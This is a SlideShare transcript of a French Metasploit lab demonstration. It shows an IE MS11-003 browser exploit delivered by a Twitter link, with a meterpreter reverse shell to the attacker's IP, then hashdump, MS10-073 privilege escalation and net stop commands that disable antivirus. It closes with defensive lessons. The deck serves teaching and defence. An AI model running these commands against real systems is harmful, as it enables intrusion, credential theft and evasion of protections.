• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Scénarios d'exploitation Metasploit - FR : Scénario 2
 

Scénarios d'exploitation Metasploit - FR : Scénario 2

on

  • 1,249 views

 

Statistics

Views

Total Views
1,249
Views on SlideShare
1,110
Embed Views
139

Actions

Likes
0
Downloads
9
Comments
0

2 Embeds 139

http://labs.zataz.com 136
http://www.slideshare.net 3

Accessibility

Categories

Upload Details

Uploaded via as Apple Keynote

Usage Rights

CC Attribution License

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n

Scénarios d'exploitation Metasploit - FR : Scénario 2 Scénarios d'exploitation Metasploit - FR : Scénario 2 Presentation Transcript

  • Scénarios Metasploit Scénario 2Http://labs.zataz.com - Http://twitter.com/eromang
  • Scénario 2 : Topologie Target Firewall Attacker Gateway 192.168.111.0/24 192.168.178.0/24 Target (Cible) : - Windows XP SP3 - L’utilisateur « test » a un compte limité en privilèges - IP : 192.168.111.129 - Passerelle par défaut : 192.168.111.128 - Anti-virus : Ad-Aware Free / Windows Defender - Firewall Windows activé - Vulnérable à MS11-003 & MS10-073 Firewall Gateway : - Eth0 : 192.168.111.128 (interface interne) - Eth1 : 192.168.178.59 (interface externe) Attacker (attaquant) : - IP : 192.168.178.21
  • Scénario 2 : Règles Firewall• L’administration du Firewall s’effectue par SSH depuis le réseau interne• Le réseau interne peut effectuer des requêtes « Any » vers le réseau externe
  • Scénario 2 : Story-Board✤ Cette topologie réseau correspond à la plupart des réseaux ADSL d’internautes et aussi à la configuration réseau classique de petites et moyennes entreprises.✤ La cible à trois contre-mesure activées : Comme vous allez le voir aucune ne réagit ! ✤ Anti-virus Ad-Aware Free mis à jour avec une configuration par défaut. ✤ Anti-spyware Windows Defender mis à jour avec une configuration par défaut. ✤ Firewall Windows avec une configuration par défaut.✤ La cible est vulnérable à la vulnérabilité Internet Explorer MS11-003 et à la vulnérabilité MS10-073 Keyboard Layout ✤ MS11-003 sera le point d’entré ✤ MS10-073 permettra l’escalade de privilèges (Stuxnet)
  • Scénario 2 : Story-Board✤ L’attaquant envoi un message Twitter à sa cible. Le message contient un lien malveillant dirigeant vers un site permettant d’exploiter la vulnérabilité Internet Explorer MS11-003.✤ La cible clique sur le lien Twitter, et la vulnérabilité MS11-003 est exploitée. Après cette exploitation un «payload» meterpreter reverse_tcp est initié à destination de l’attaquant sur le port 4444/TCP.✤ L’attaquant va vérifier toutes les contre-mesures installées sur sa cible, tenter des les désactivées, sans succès, car il n’a pas les privilèges nécessaires.✤ L’attaquant doit vérifier si les patchs suivant sont installés, afin de pouvoir lancé l’attaque du type «escalade de privilèges» MS10-073. ✤ MS11-012 (KB2479628) / MS10-098 (KB2436673) / MS10-073 (KB981957) ✤ Si un de ces patchs est installé, l’escalade de privilèges par le biais de MS10-073 sera impossible. winenum est la solution pour récupérer la liste des patchs installés.✤ L’attaquant va exécuter l’escalade de privilèges MS10-073.
  • Scénario 2 : Commandesuse exploit/windows/browser/ms11_003_ie_css_importset SRVHOST 192.168.178.21set SRVPORT 80set URIPATH /readme.htmlset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.178.21exploitmigrate X -> vers un autre processuskill X -> 2 fois -> notepad.exe & le processus iexplorer.exerun getcountermeasurerun getcountermeasure -kgetuidshellecho %USERNAME%getprivsgetsystemhashdumpsysinfoipconfigroutebackground
  • Scénario 2 : Commandesuse post/windows/escalate/ms10_073_kbdlayoutset SESSION 1runsessions -i 1getuidmigrate X -> vers un processus «NT AUTHORITYSYSTEM»shellecho %USERNAME%net startnet stop "Lavasoft Ad-Aware Service"net stop "Windows Defender"net startps
  • Scénario 2 : Leçons apprises•Mettre à jour son OS et ses applicatifs !•Ne jamais cliquer sur des liens, surtout raccourcis, provenant de sources inconnues !•Ne pas faire confiance à son anti-virus !•Sélectionner un anti-virus qui est capable de détecter des attaques basiques !•Ne pas faire confiance à ses Firewalls (Locaux ou distants) !•Ne pas autoriser des connexions sortantes du type «Any» depuis votre réseau internevers des réseaux qui ne sont pas de confiance ! Limiter les connexions sortantes à vosvéritables besoins. 8